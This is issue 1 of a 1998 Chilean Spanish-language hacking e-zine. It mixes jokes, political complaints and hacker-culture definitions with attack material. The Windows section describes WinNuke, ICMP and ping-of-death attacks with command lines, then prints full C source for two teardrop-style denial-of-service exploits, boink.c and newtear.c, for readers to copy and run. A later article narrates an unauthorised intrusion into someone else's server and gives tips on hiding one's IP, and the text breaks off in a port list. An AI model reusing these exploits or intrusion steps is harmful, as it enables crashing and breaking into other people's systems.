Proyecto r 01

Martes, 30 de Noviembre de 1999 01:00

Chile Actualidad, Hackers, Crackers y demases, Que le vamos a hacer es Guindows parte I, Hack en acción , desde Guindoze95 parte I, Chistes , bromas , y cualquier burrada que se te ocurra, Es usted una persona Versión 2.0 ?, Como robar nicks y pass de IRC.....

Texto Completo:

******* GUELKOME GUELKOME GUELKOME *******

###################################
# BIENVENIDOS #
# #
# A #
# #
# Proyecto_R #
# La Copia Infeliz Del Eden #
###################################

Numero "I"

08 de Junio 1998

URL : http://www.bigfoot.com/~proyecto_r
http://www.geocities.com/colosseum/sideline/9497

E-Mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

________________________________________________________________________
________________________________________________________________________

Si se�ores , este es el primer E-Zine Chileno desde ak�
trataremos de abordar todos los temas del Under nacional ,
respectivamente de Hack , Phreack , Warez y demases .
Estan todos invitados a colaborar en esta noble causa ...
sysadmin , hacker , wannabes , computines en Gral.

���� A Caso es esto ���Revoluci�n!!! ..... Emociones Clandestinas .

Usuario -- Alo soporte .
Soporte -- Si digame (tan eficientes como siempre jeje)
Usuario -- Sabe se�or que la pantalla se vee borrosa ,
para mi que el disco duro esta sucio ,
por que no lo vienen a limpiar ....,, PLOP

( Hecho sacado de la vida Real , los nombres de los personajes
han sido cambiados para proteger a los inocentes) .

�����������������INDICE�����������������������������������������������

1 .- Editorial
2 .- Chile , Actualidad .
3 .- Hackers , Crackers y demases ..
4 .- Que le vamos a hacer es Guindows parte I.
5 .- Hack en acci�n , desde Guindoze95 parte I .
6 .- Chistes , bromas , y cualquier burrada que se te ocurra .
7 .- Es usted una persona Versi�n 2.0 ?
8 .- Como robar nicks y pass de IRC .
9 .- Noticias al cierre.
10 .- Despedida .-

�����������������������������������������������������������������������

*******************
* *
* 1 EDITORIAL. *
* *
*******************

Bueno aki estamos comenzando el primer (si no es el ultimo)
numero de Proyecto_R , el Primer E-Zine chilensis que existe
en la tierra . Nuestra labor sera imponer en este pa�s una
cultura informatica , es decir ..--- ocupar nuestrso recursos
, para algo mas que piratear juegos y andar bajando los mov ,
mpg y avi que hay de la Pamela Anderson hechandose unas buenas
..???. Utilizar nuestro modem para algo mas que meternos a los
sitios XXX que tanto le gustan a los chilenos ***(ACLARACION
PARA NUESTRSO LECTORES EXTRANJEROS [si es que hay :o) ] ...
LOS CHILENOS SON MUY GUENOS PARA ANDAR BAJANDO FOTOS , MOV ,
ETC.. TODOS xxx YA QUE LA LEGISLACION CHILENA ES TAN CARTUCHA
QUE NO PERMITE PORNOGRAFIA EN VIDEO CLUBS , NI SEX SHOP NI NADA DE ESO
.. CON SUERTE TE CONSIGUES UNAS PELICULAS COCHINAS , QUE SON DE
MUY MALA CALIDAD POR LA CANTIDAD DE VECES QUE HA SIDO PIRATEADA
....."""PREGUNTA A LOS SE�ORES LEGISLADORES CHILENOS"" .....
.- USTED HA VISTO ALGUNA PELICULA PORNO??????
.- LE GUSTO ?????.......)

Despues de este "peque�o" parentesis seguimos con lo nuestro . La idea
es aprender a sacarle provecho a nuestros recursos , a ver el facinante
mundo que hay detras de los monitores de tus terminales .... del
facinante mundo del bit .... desde ahora en adelante todo sera escrito
en binario .. 0001 1110 0010 1100 1000 (broma hee) ...

PERFIL DEL COMPUTIN CHILENO **************************************

a.- Definici�n de comput�n : Ser enajenado , que vive gracias a la
informatica . Ya sea Admin , soporte redes , Tecnico , estudiante
universitario , Etc....
b.- Definici�n de Chileno : Picante , rasca , ordinario , cartucho ,
inculto , huevon , JAGUAR ,Ingles de sudamerica (lo chistoso que ni
el 30% de los chilenos saben hablar ingles ..:-), varios ...

El computin chileno es amigo de MOCO$OFT , es decir le gusta todo en
bandeja , o sea programas faciles de usar , resoluci�n grafica etc...
el computin chileno muy pocas veces se interesa en aprender el por que
o como funciona la tecnolog�a , si no se preocupa de aprovecharla en
un 10% ; el que no me crea que me responda cuanta gente sabe hacer
macros en EXCEl , que sacan con tener la ultima chupada del mate en
tecnolog�a o software si ni siquiera saben ocuparla , y lo que es
peor , cuanta gente se interesa en aprender realmente a usarla ....????
Normalmente la gente que trabaja en informatica se va quedando en el
pasado facilmente por que no tiene aquel bichito que produce la
curiosidad , el por que esto ; el por que de esto otro ..solo les
interesa que funcione y listo .

Es por estas razones que en "PROYECTO_R" vamos a trabajar para dar
vuelta esta situaci�n y para darles un poquito mas de trabajo a los
administradores (que ne realidad son bien flojitos) de redes ..
que de seguirdad parece que no saben nada ... si quieres comprobarlo
date unas vueltas por los web chilenos y te encontraras con grandes
sorpresas .

DECLARACION DE PRINCIPIOS .------**************************************

No es la idea de "PROYECTO_R" incitar a la ilegalidad , toda la
informaci�n que salgan en nuestras p�ginas son con fines educativos
y didacticos . TEN CUIDADO NO ANDES HUSMENADO LA PRIVACIDAD DE OTRAS
PERSONAS , ES UN DELITO Y PUEDES IR A PARA A LA CARCEL , y no es chiste
mas adelante sabran por que .

PROYECTO_R NO SE RESPONZABILIZARA DE NINGUN ACTO ILICITO QUE COMETAS ,
CUALQUIER CONDORO QUE TE PEGUES ES TU PROPIA RESPONZABILIDAD .

PROYECTO_R es una sociedad sin fines de lucro O SEA ES GRATIS QUE NO
TE VENDAN LA POMADA ... ADEMAS QUIEN PAGAR�A POR ESTO ; no nos interesa
la politica , el futbol , ni la religi�n ..... preferimos vivir en paz .
:o) .-- si quieres aportar algo , bienvenida ser� tu colaboraci�n para
mantener vivo este magazine . Entiendase como colaboraci�n , la
mantenci�n de nuestro sitio WEB , articulos , noticias ..
algun FTP o BBs o lo k sea .

CUALQUIER ATAQUE , DE CUALQUIER TIPO A CUALQUIER SISTEMA QUE CONTENGA
PORNOGRAF�A INFANTIL.(INCLUSO ALGUNAS BBS CHILENAS JEJE) SERA
AMPLIAMENTE RESPALDADO POR PROYECTO_R Y ASUMIMOS
TODAS LAS RESPONSABILIDADES Y CONSECUENCIAS DEL CASO .
ESTAMOS A FAVOR DE LA LIBERTAD DE EXPRESI�N PERO NO DEL ABUSO .

*****************************************************************************
Vamos a empezar con articulos bastante modestos , ya que por ser
primer numero hay muy pocos colaboradores ... tendran que entendernos ...
pero si quieres mejorar la calidad de este E-Zine Escribenos y colabora. ...
*****************************************************************************

*************************************
* *
* 2. -ACTUALIDAD CHILENA *
* *
*************************************

___________________________________________________________By PlaXiuS

>>>>>> Despues del boom que a tenido internet , por la cual los
ISP se estan llenando los bolsillos , para que decir la CTC
(ya no les basta con el ajuste sencillo) ya que gracias al
trafico telef�nico se esta haciendo una fortuna ... o me vas
a decir que es facil despegarte de tu PC . Cuando estas navegando
???? ... si tuvieramos el sistema tarifario de los YANKIS
, cargo fijo mensual = tr�fico ilimitado local .. el cuento
ser�a otro . Estamos Condenados al Subdesarrollo , a ser un pa�s
tercermundista , por cualpa de las trifas .Llego el Boom de
intranet ... todas las empresas quieren tener
intranet , despues de Todas las conferencias que dio Moco$oft ,
en casa piedra y en el Estadio Manquehue ,(incluido el cafecito ,
el almuerzo , y las modelitos que taban bien guenas ;todos
impresionados , pero con que uno cayera .. pagaban todo eso y
les sobraba plata jaja) sobre migraci�n de redes a 32 bits ..
donde tiene metidos todos sus productitos , he Intranet e Internet
, donde Seg�n ellos tienen los mejores productos y los mas
Gracioso dicen ser los MAS SEGUROS . Es verdad tienen
herramientas bastantes interesantes como el Visual Estudio ,,,
para crear aplicaciones ActiveX y para crear aplicaciones SQL
para el WEB... pero a costa de que digo yo ..???? . Todos quieren
Cambiarse a NT y migrar sus redes y la cacha de la espada pero no
saben con que chichitase estan curando .

>>>>> Se ha hablado en el pa�s que los indices de delincuencia han
aumentado , es increible la cantidad de delitos que se estan
cometiendo en chile , realmente el sistema judicial VALE HONGO
por no decir callampa que suena mas feo . Como es posible que
un tipo que haya matado a un hombre y a su hijo , salga en
libertad en un mes ; Que un reo con salida diaria haya violado
y asaltado a varias mujeres ; si sigo termino ma�ana .........
Don naricitas dio un lindo y bello discurso diciendo que el
gobierno va a combatir a la delincuencia ; Pero a los se�ores
carabipacos no les quieren subir el sueldo . (este
es el cuento de nunca acabar) Como es posible que a los
carabineros los mantengan con una caga de sueldo ... por que
no hacen una dieta parlamentaria y lo que ahorren de ah�
densela a los carabipacos .. que se lo merecen se sacan la
xuxa trabajando ...TOTAL LOS SE�ORES POLITICOS TIENEN LO
SUFICIENTE CON LO QUE LES PAGAN LOS EMPRESARIOS PARA QUE
LEGISLEN EN FAVOR DE ELLOS O NO ????. Lo que me da mas rabia
de todo es que le alcanza el presupuesto para hacerles una
pisina y jacuzzi en el ultimo piso del congreso .... cuantos
sueldos se pagar�an con esa estupida inversi�n .. al final
ese dinero es de todos los chilenos y los se�ores politiqueros
la gastan para sus lujos ..!!!ES EL COLMO ��� ... a todo esto
por que no me instalan un jacuzzi en mi casa jejej ... (cuando
tenga casa propia ) .Son 800 millones de pesos ... y no es la
acumulaci�n del loto .

>>>> ���� ATENCION , INFORMACION DE SUMA IMPORTANCIA !!!!
Hemos sabido de buena fuente , que se estan tomando medidas en
contra del hacking en chile , El ministerio de Defensa junto al
ministerio de Interior ; cordinados con INTERPOL . Como la viste
, lo mas probable es que los ISP tomen parte en este juego ,
talvez hagan un departamento ANTIHACK .. asi que tomen sus
precauciones , CUIDADO CON LOS SURFEOS A PUERTOS etc ... Por que
no creo que estos se�ores entiendan la diferencia entre un hacker
y un cracker... mas adelante la explico por si alguien del
ministerio nos lee :o) ....

*********************************
*2.- HACKERS CRACKERZ Y DEMASES *
*********************************

__________________________________________________________By PlaXiuS

Bueno primero que nada vamos a dejar las cosas claras (o tal vez no ?)
en el mundo Under hay varios tipos de diciplinas por asi llamralas .
Aki les nombro algunas :

Hackers : Son aquellos genios de la inform�tica que se dedican a
estudiar y conocer todos los sitemas inform�ticos que puedan , solo por
mera curiosidad , de esta forma es que andan surfeando puertos y
buscando fallas de seguridad para poder entrar en estos sistemas solo
por diversi�n . Seg�n la etica del hackers , solo entran en los sistemas
con ningun fin delictivo .. un hacker jamas borrara informaci�n o
bases de datos etc... lo mas probable es que el hacker les deje
un mensaje a los administradores diciendoles cual es la falla de
seguridad que tienen etc....(yo quiero ser como ellos alg�n d�a)

Wannabes : Son los verdaderos aprendicas del hackers ... aunque el
llegar a ser hackers no es cosa de decir a ya soy hackers , si no que
el hackers siempre va aprendiendo cosas nuevas .NO CONFUNDIR CON LAMERS
NO TIENEN NADA QUE VER.

Crackers : seg�n yo , hay dos tipos de crackers ..

tipo a : los chicos que se dedican a crackear juegos o mas bien dicho
a romper claves via software , crean cracks para transformar software
shareware a original etc...(buenos tipos)

tipo b : Aquellos tipos que hacen hacking con el solo motivo de
destruir informaci�n , borrar discos .. etc. todo con fines destructivos
es por la culpa de estos tipos , la mala fama que se han ganado los
hackers ya que siempre los confunden .(die carcker maldito)

Phreackers : Son aquellos chikos que se dedican a estudiar los sistemas
telef�nicos para poder sacarle el mayor provecho . Utilizan diversas
herramientas , Cajas de tonos , blue box , black box .. etc..normalmente
terminan o derivan en el hacking.

Warez : todo aquel tipo que se dedique al pirateo de software , que
normalmente los distribuye gratis en internet , BBs y demases .

Lamers : Son aquellos (muchos) chikos que andan por ah� en irc ,
dandoselas de hackers sin saber nada ... son aquellos que creen que
por tener un mailbombing o por tener un lindo script de IRC pueden hacerse
llamar hackers . No es cierto COYOTE ?

Delincuentes informaticos : Todo aquel tipo que trate de sacar provecho
personal , utilizando variadas herramientas muy parecidas a las del
hacker , por no decir las mismas . Estos tipos se dedican a robar bases
de datos , lista de clientes , sabotaje , etc...muchos gobiernos
contratan a estos tipos para sabotear y robar a otros paises e
instituciones ... En muchas revistas he leido ..."el Gobierno de la
Union sovietica contrato HACKERS para sabotaer los sistemas Europeos y
americanos " ...Falso se�ores , esos tipos no eran hackers , Eran
delincuentes ........ por no decir lamerz. Es diferente pedir
prestada una copia de la prueba de Tcp/Ip que el profe dejo en la red
, a sabotear y robar a bancos e instituciones , no se�ores los
hackers no hacen esas cosas....

Bueno esta es solo una peque�a introducci�n de lo que existe en el
Under , hay mucha mas informaci�n sobre estos temas pero estan tan
manoseados y explicados que ya no vale la pena reescribirlos ...
para mas informacion busca en nuestra secci�n de links , ahi
encontraras varios E-ZInes que tienen una visi�n mas detallada del
tema .

*****************************************
*4.- QUE LE VAMOS A HACER ES GUINDOWS I *
*****************************************

_____________________________________________________________ By PlaXiuS

Una vez prestando servicios a un usuario , me comento que por lo menos
una vez al d�a su pantalla se pon�a azul con alg�n error medio extra�o
que le obligaba a resetear su equipo , cual era el problema . Yo le
respond� que pod�an ser varios pero que lo chequear�a ; el usuario me
contesto con tono burlezco .- pero como tantas cosas pueden ser??? a lo
cual repuse .--------"QUE LE VAMOS A HACER ES GUINDOWS" ..........
Recuerdan que hace algunos d�as a don Billy se le colgo el guindoze 98
en una conferencia jajaj , (para que vea don tito la mugre de software
que saca al mercado), pero ya hab�a pasasdo antes en una demostraci�n
de Guindoze NT siii vieran ustedes aquel papelon ,,,..QUE NT ES ROBUSTO
, QUE NT ES SEGURO , QUE NT AKI ALLA ... y se le cuelga en plena
demostraci�n ...jajaja que guena ,.,,.
Bueno desgraciadamente no hay otro sistema operativo que los usuarios
mortales puedan utilizar ... UNIX Y LINUX NO SON FACILES ; costar�a
bastante cambiar al simple usuario a manejar otro entorno , ademas de
la compatibilidad de softwarez de uso diario .
bueno ahora pasemos a lo que todos quieren ... veamos que tan buenos
son estos sitemas operativos ....

WINDOWS 95

Bueno he aki el sistema operativo reinante en estos a�os , veamos que
tan potente es :

Primero que nada date una vuelta a Microsoft a travez de la inet y te
daras cuanta que casi todos los dias sacan parches nuevos -... eso deja
claro que el sistema operativo es como las weeeaas .

NUKES
Se le llama Nuke a cualquier tipo de ataque que se haga a travez de paquetes TCP/IP , a diferentes
puertos , aprovechando los fallos de sistemas operativos y la docibilidad del TCP/IP ya que por ser
un sistema abierto , permite cualquier tipo de cambios ;)) .

OOB Nuke.-
Los famosos winnuke , popularisimo en IRC se llama winnuke ya que solo afecta a las maquinas que usa
guindoze . El ataque consiste en mandarle el flag OOB que signifca fuera de banda (out of band) a algun puerto
normalmente el 139 , produciendo asi un lindo pantallazo azul con el tipico mensaje de guindoze de volcado
de pila , obligando al usuario a reiniciar su maquina .. jejeje .- este bug esta ampliamente parchado .-
Si queires chequear si estas protegido contra este nuke , haz lo siguiente .. cierra todos los programas
que puedas y entra en la siguiente direcci�n .- http://xuxa.gr.ssr.upm.es/cgi-bin/winnuke .- si te caes ya
sabes , buscate el parche o prueba renombrando el archivo c:\windows\system\vnbt.386 por
c:\windows\system\vnbt.bak .-

ICMP Nuke
El icmp es un subprotocolo de IP , que es el encargado de informar los errores producidos durante
la transmisi�n de paquetes , Ahora aprovechando nuevamente que TCP/IP es un protocolo abierto
que podemos manejar a nuestro antojo (bueno no es tan as� yo nunca he modificado un paquete a mano)
lo que hacemos es mandar paquetes con ICMP errors a la vicitma podemos desconectarlo de la red .

Ping de la Muerte
Bueno la utilidad ping es la encargada de verificar conexiones , tiempo de respuestas etc.... ahora podemos
adaptarlo para atacar a alguien .... ;)) como??? muy simple podemos cambiar el tama�o de los paquetes
de tal forma que la victima al momento de ordenarlos para enviar la respuesta , ya esta recibiendo el otro paquete
de tal forma que se crea un atochamiento de paquetes , de tal forma que no es capaz de mantenerse conectado y
zapp se cae.-

desde guindoze ser�a de la sgte forma .-

c:\windows>ping -l 65510 -t

desde Unix ser�a .-

$ ping -s 32000

Problemas con impresi�n : Es sabido que cuando se manejan impresoras en Red
Novell dentro de win95 , misteriosamente desaparecen del grupo configurai�n
.Ya me a tocado varias veces verificar usuarios que no pueden imprimir y
cuando se va a verificar el estado de las impresoras , Han desaparecido de
la configuraci�n :- SOluci�n RESETEO .-

Incompatible con novell : La verdad que trabajar con Novell y Windoze se hace
cada vez mas dificil , ya que el cliente para redes Novell de Microsoft , no
permite el funcionamiento de los script de inicio , los mapeos por defecto y
lo que es peor no permite que el usuario cambie su password en novell .
Soluci�n .- Instalar el Cliente32 de Novell pero este cliente te mas lento
er Windoze(no se si a proposito) , y crea un lio en las password que el usuario
pocas veces entiende , en especial si corres una red NT en paralelo .

Bueno este es el primer capitulo de esta saga , para la proxima esperamos tener
algunas sorpresas sobre WIndoze NT y 95 , y quizas aparezca algun articulillo de
Mierdows 98 .- pero no nos despediremos sin dejar con ustedes un par de codigos
fuentes de un par de Nukes que son unas variantes del conocido Teardrop .

NOTA .- Estamos experimentando con el archivo services de Guindoze a ver si
sacamos provecho de este y talvez encontramos algo entretenido que se pueda hacer
, pero ya esta abierta la idea , a trabajar se ha dicho .-

Copia el c�digo entre los asteriscos , sin los asteriscos .-

****************Boink.c ********************************************************

/*
boink.c - a modified bonk.c

==bendi - 1998==

bonk.c - 5/01/1998
Based On: teardrop.c by route|daemon9 & klepto
Crashes *patched* win95/(NT?) machines.

#include
#include

#include
#include
#include
#include
#include
#include
#include
#include

#define FRG_CONST 0x3
#define PADDING 0x1c

struct udp_pkt
{
struct iphdr ip;
struct udphdr udp;
char data[PADDING];
} pkt;

int udplen=sizeof(struct udphdr),
iplen=sizeof(struct iphdr),
datalen=100,
psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
spf_sck; /* Socket */

void usage(void)
{
/* fprintf(stderr, "Usage: ./bonk [num]\n"); */
fprintf (stderr, "Usage: ./boink [num]\n");
exit(0);
}

u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;

res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}

void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}

int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
int dst_prt)
{
int bs;
struct sockaddr_in to;

memset(&pkt, 0, psize);
/* Fill in ip header */
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(udplen + iplen + PADDING);
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = IP_UDP;
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons(0x2000); /* more to come */

pkt.udp.source = htons(src_prt); /* udp header */
pkt.udp.dest = htons(dst_prt);
pkt.udp.len = htons(8 + PADDING);
/* send 1st frag */

to.sin_family = AF_INET;
to.sin_port = src_prt;
to.sin_addr.s_addr = dst_addr;

bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));

pkt.ip.frag_off = htons(FRG_CONST + 1); /* shinanigan */
pkt.ip.tot_len = htons(iplen + FRG_CONST);
/* 2nd frag */

bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
(struct sockaddr *) &to, sizeof(struct sockaddr));

return bs;
}

void main(int argc, char *argv[])
{
u_long src_addr,
dst_addr;

int i,
/* src_prt = 55,
dst_prt = 55, */
start_port,
stop_port,
bs = 1,
pkt_count;

if (argc < 5)
usage();

start_port = (u_short) atoi (argv[ 3 ]);
stop_port = (u_short) atoi (argv[ 4 ]);
if (argc == 6)
pkt_count = atoi (argv[ 5 ]);

if (start_port >= stop_port ||
stop_port <= start_port) {

start_port = 25;
stop_port = 65;

}

if (pkt_count == 0) pkt_count = 10;

/* Resolve hostnames */

src_addr = host_to_ip(argv[1]);
if (!src_addr)
quit("bad source host");
dst_addr = host_to_ip(argv[2]);
if (!dst_addr)
quit("bad target host");

spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");

for (i = 0; i < pkt_count; ++i)
{
int j;

printf ("(%d)%s:%d->%d\n", i, argv[ 2 ], start_port, stop_port);

for (j = start_port; j != stop_port; j++) {

/* fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt); */
fondle (spf_sck, src_addr, dst_addr, j, j);

}
usleep(10000);
}

printf("Done.\n");
}

*******************fin del boink.c*************************************************

Copia el c�digo entre los asteriscos , sin los asteriscos .-

*******************newtear.c*********************************************************

/* Newtear.c
* Seemingly, a new teardrop type exploit. Affects NT4, and Win95.
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x14 /* datagram frame padding for first packet */ /* JD Change pad size to 20 decimal. */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;

fprintf(stderr, "teardrop route|daemon9\n\n");

if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}

while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;

fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");

for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}

/*
* Send two IP fragments with pathological offsets. We use an implementation
* independent way of assembling network packets that does not rely on any of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */

sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;

/*
* Grab some memory for our packet, align p_ptr to point at the beginning
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING); // Set it all to zero

byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING*2); /* UDP total length */ /* Increases UDP total length to 48 bytes
Which is too big! */

if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}

/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to work
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);

if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}

u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}

void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}

/* EOF */

******************** Fin de newtear.c ********************************************

************************************************************************
Cualquier comentario , critica o correcci�n a este articulo , por favor
hacerla llegar a PlaXiuS :
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

Estamos abiertos a caulquier sugerencia
************************************************************************

*************************
* 5.- HACK en Acci�n *
* (B�sico) *
* Parte I *
* y en GuindoZe 95 " *
*************************

_______________________________________________________________ By PlaXiuS

Hola amigos como estan , esta es la primera parte de una serie de textos
que hablaran o mas bien dicho narraran algunos hack ejecutados en algun
server del mundo , es asi de esta forma que explicaremos poco a poco
algunas t�cnicas BASICAS de hack ademas de visualizar los problemas y
barreras que se nos iran presentando . Este texto es especial para los
novatillos que andan por ah� en la red preguntando como se hackea , pero
antes de aprender las tecnicas basicas me gustaria dar algunas recomendaciones
y sugerencias .

1.-Ser o no ser hacker esa es la wea . Primero que nada tienes que entender
que ser hacker no es una moda , Hoy en dia todos se creen hackers ..
cuando no les alcanza ni para ... no se. lamers suena muy feo ... es mejor
declararse novato que es mas facil ; como yo .. soy solo un novatillo ...
si haces hacking , no lo andes divulgando en todo el canal #lamers de irc ,
mejor guarda silencio y si no te aguantas las ganas , comentaselo solo
a tus mas cercanos amigos ... . Si trabajas o estudias , etc.. trata que tus
compa�eros no sospechen de ti ... trata de no tener fama de hacker ni de nada
, no cometas el error que cometi,. yo . Donde trabajo ya tengo fama y
cualquier cosa que pase yo voy a ser el primer blanco (aunque no tenga nada
que ver en el asunto :-) .

2.- Antes de andar practicando el hacking por ahi debes saber que tienes
que cuidarte , ya sabes por que , de lo contrario leete las actualidades
y sabras porque de debes cuidar tu trasero . Bueno trataremos de mostrar
algunas formas de encubrirte .. . es decir que tu ip no aparezca en ningun lado .
Pues es esa ip la que te delatara .

3.- No da�ar sistemas ajenos ... si logras entrar a un server ajeno y logras
tener Root no lo da�es ni modifiques , es un delito , recuerda que hacemos esto
por deporte ... ES como la pesca deportiva .. luchamos por pescar un
hermosos ejemplar ... le sacamos una foto y lo dejamos ir .

4.- Cepillate los dientes y lavate el potito antes de ir a dormir :-p ....

Esta es la narraci�n de un hack bastante simple que estoy llevando acabo
en estos momentos , la verdad es que aun no tengo Root en la maquina
pero en eso estoy :-) - La verdad voy hablar de este hack por lo
simple y facil que ha sido encontrar la informaci�n y encontrar la entrada
a este server .

Se me ocurrio visitar varios web en internet , hasta encontrar algo interesante
hasta que llegue a uno bastante peculiar , tenia pinta de ser algo asi
como una red de mafiosos o traficantes , no sep , algo por el estilo
asi que no encontre algo mejor que averiguar un par de cositas de este server
asi que manos a la obra .

SCANEANDO PUERTOS .----------------------------------------------------

Tome mi guindoze , y lo primero que hize fue
hacerle un portscan (en castellano un sorfeo a los puertos) ..es decir
para los menos metidos en el tema .. saber que servicios estan abiertos en
el servidor ejemplo .. ftp , telnet , sendmail , http , etc...
bueno aki les va una lista que esta en casi todos los E-Zine y articulos
sobre hacking , que definen los puertos y sus servicios .

LISTADO DE PUERTOS

echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
qotd 17/udp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/tcp nameserver
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp nameserver # name-domain server
domain 53/udp nameserver
nameserver 53/tcp domain # name-domain server
nameserver 53/udp domain
mtp 57/tcp # deprecated
bootp 67/udp # boot program server
tftp 69/udp
rje 77/tcp netrjs
finger 79/tcp
link 87/tcp ttylink
supdup 95/tcp
hostnames 101/tcp hostname # usually from sri-nic
iso-tsap 102/tcp
dictionary 103/tcp webster
